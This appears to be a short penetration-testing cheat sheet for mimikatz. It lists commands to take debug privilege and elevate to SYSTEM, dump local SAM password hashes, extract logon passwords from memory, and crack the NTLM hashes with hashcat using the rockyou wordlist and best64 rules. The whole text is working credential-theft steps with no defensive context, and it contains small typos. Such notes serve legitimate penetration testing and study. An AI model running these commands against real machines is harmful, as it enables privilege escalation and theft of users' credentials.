mimikatz

  • debug privilege and escelate to system

    • privilege::debug

    • token::elevate

  • dump sam local password hashes

    • lsadump::sam

    • can be craked using hashcat

      • put files into a file (filename.hash)

      • hashcat --help | grep -i "ntml"

      • hashcat -m 1000 file.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

      • hashcat --show -m 1000 file.has

  • get logon passwords

    • sekurlsa::logonpasswords

Last updated